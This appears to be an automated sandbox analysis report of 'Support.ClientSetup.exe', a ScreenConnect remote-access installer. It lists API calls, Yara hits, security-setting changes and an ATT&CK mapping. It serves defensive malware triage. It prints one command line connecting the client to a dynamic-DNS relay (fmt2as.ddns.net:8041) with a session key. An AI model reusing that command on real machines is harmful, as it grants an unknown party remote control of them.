                                  Source: svchost.exe, 0000000F.00000002.2316303827.000001FE4646F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: svchost.exe, 0000000F.00000002.2317141304.000001FE46502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: svchost.exe, 0000000F.00000002.2314262728.000001FE4642B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                  Source: ScreenConnect.ClientService.exe, 00000008.00000002.2313032034.00000000016D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllmM
                                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  .NET source code references suspicious native API functions
                                  Source: 0.0.Support.ClientSetup.exe.11778ec.1.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                                  Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                                  Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                                  Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                                  Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                                  Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a9232c38f7080cfd\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (a9232c38f7080cfd)\screenconnect.clientservice.exe" "?e=access&y=guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40&k=bgiaaackaabsu0exaagaaaeaaqbxzlpqh5kocp8cjbkktck5cqkcoz1k1jpbkgoox2untnea0kbsjdhihm6awc3b94odgxip4bb3wztv%2bjzdrevsnjwv79ysvcwzt5y1uopq5ercoziq9tchhj%2fdfqkghg%2fdkh8j%2brvdsv1rscnvosc6drlnvqj%2bn3r4mz%2fwwir4lxhocknshhcsdo6lbqtdrpsir%2fwv9gauxfgi2d%2bsp4rrrbfakpm2cyrpimchkea3ahkqy3om2oxn5%2bjcdfs6u9visbmf5vwqjogdg1gykn2bckn6fqqkj8qoha84kuid00fcep90jriw7aujprfff09vlweqobl%2bxeri6rnkx3nz&c=online&c=online&c=online&c=&c=&c=&c=&c="
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Progman
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC3B3642 CreateNamedPipeW,9_2_00007FF9CC3B3642
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F42D07 RtlGetVersion,0_2_05F42D07
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Changes security center settings (notifications, updates, antivirus, firewall)
                                  Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                                  Modifies security policies related information
                                  Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                                  Source: svchost.exe, 00000010.00000002.2317723634.0000018BE3902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                                  Source: svchost.exe, 00000010.00000002.2317723634.0000018BE3902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                  Source: Yara matchFile source: Support.ClientSetup.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.2.Support.ClientSetup.exe.5fc0000.7.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.2dafa18.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.8d0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.Support.ClientSetup.exe.5fc0000.7.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.Support.ClientSetup.exe.cf5db0.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.Support.ClientSetup.exe.c463d4.4.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 11.2.ScreenConnect.WindowsClient.exe.34dfa58.4.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.Support.ClientSetup.exe.c30000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.1074872097.0000000005FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000002.2321217327.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.1080490569.0000000007E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000002.1160978410.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.1069609177.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Support.ClientSetup.exe PID: 6924, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6168, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6504, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6568, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF541DFE2B6D389D3F.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF5EA8DB2B84680E0B.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF97FD4A0028A9EAFA.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFB36FFE6B04D3445D.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFD73F95F8E305E1F6.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF22578DDE847BC16D.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Config.Msi\3b7ed6.rbs, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Installer\MSI8185.tmp, type: DROPPED

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire Infrastructure1
                                  Valid Accounts                                  		41
                                  Windows Management Instrumentation                                  		1
                                  DLL Side-Loading                                  		1
                                  DLL Side-Loading                                  		21
                                  Disable or Modify Tools                                  		OS Credential Dumping11
                                  Peripheral Device Discovery                                  		Remote Services11
                                  Archive Collected Data                                  		2
                                  Encrypted Channel                                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomains1
                                  Replication Through Removable Media                                  		1
                                  Native API                                  		1
                                  DLL Search Order Hijacking                                  		1
                                  DLL Search Order Hijacking                                  		1
                                  Deobfuscate/Decode Files or Information                                  		LSASS Memory1
                                  File and Directory Discovery                                  		Remote Desktop ProtocolData from Removable Media1
                                  Non-Standard Port                                  		Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts12
                                  Command and Scripting Interpreter                                  		1
                                  Component Object Model Hijacking                                  		1
                                  Component Object Model Hijacking                                  		1
                                  Obfuscated Files or Information                                  		Security Account Manager55
                                  System Information Discovery                                  		SMB/Windows Admin SharesData from Network Shared Drive1
                                  Non-Application Layer Protocol                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal AccountsCron1
                                  Valid Accounts                                  		1
                                  Valid Accounts                                  		1
                                  Software Packing                                  		NTDS61
                                  Security Software Discovery                                  		Distributed Component Object ModelInput Capture11
                                  Application Layer Protocol                                  		Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchd2
                                  Windows Service                                  		1
                                  Access Token Manipulation                                  		1
                                  DLL Side-Loading                                  		LSA Secrets2
                                  Process Discovery                                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                                  Bootkit                                  		2
                                  Windows Service                                  		1
                                  DLL Search Order Hijacking                                  		Cached Domain Credentials71
                                  Virtualization/Sandbox Evasion                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items13
                                  Process Injection                                  		1
                                  File Deletion                                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                                  Masquerading                                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                  Valid Accounts                                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                  Access Token Manipulation                                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd71
                                  Virtualization/Sandbox Evasion                                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                                  Process Injection                                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                  Hidden Users                                  		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                                  Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                                  Bootkit                                  		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                                  Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                                  Rundll32                                  		Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568673 Sample: Support.ClientSetup.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 50 59 fmt2as.ddns.net 2->59 65 Multi AV Scanner detection for submitted file 2->65 67 .NET source code contains potential unpacker 2->67 69 .NET source code references suspicious native API functions 2->69 73 5 other signatures 2->73 8 msiexec.exe 94 51 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 Support.ClientSetup.exe 5 2->15         started        17 6 other processes 2->17 signatures3 71 Uses dynamic DNS services 59->71 process4 dnsIp5 49 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->49 dropped 51 C:\...\ScreenConnect.ClientService.exe, PE32 8->51 dropped 53 C:\Windows\Installer\MSI837B.tmp, PE32 8->53 dropped 55 9 other files (none is malicious) 8->55 dropped 77 Enables network access during safeboot for specific services 8->77 79 Modifies security policies related information 8->79 19 msiexec.exe 8->19         started        21 msiexec.exe 1 8->21         started        23 msiexec.exe 8->23         started        61 fmt2as.ddns.net 194.59.31.27, 49707, 8041 COMBAHTONcombahtonGmbHDE Germany 12->61 81 Reads the Security eventlog 12->81 83 Reads the System eventlog 12->83 25 ScreenConnect.WindowsClient.exe 2 12->25         started        28 ScreenConnect.WindowsClient.exe 2 12->28         started        85 Contains functionality to hide user accounts 15->85 30 msiexec.exe 6 15->30         started        63 127.0.0.1 unknown unknown 17->63 87 Changes security center settings (notifications, updates, antivirus, firewall) 17->87 33 MpCmdRun.exe 17->33         started        file6 signatures7 process8 file9 35 rundll32.exe 10 19->35         started        89 Contains functionality to hide user accounts 25->89 57 C:\Users\user\AppData\Local\...\MSI7753.tmp, PE32 30->57 dropped 39 conhost.exe 33->39         started        signatures10 process11 file12 41 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 35->41 dropped 43 C:\...\ScreenConnect.InstallerActions.dll, PE32 35->43 dropped 45 C:\Users\user\...\ScreenConnect.Core.dll, PE32 35->45 dropped 47 4 other files (none is malicious) 35->47 dropped 75 Contains functionality to hide user accounts 35->75 signatures13

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  Support.ClientSetup.exe22%ReversingLabsWin32.PUA.ConnectWise

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Core.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Windows.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI7753.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                                  C:\Windows\Installer\MSI8195.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI837B.tmp0%ReversingLabs

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  SourceDetectionScannerLabelLink
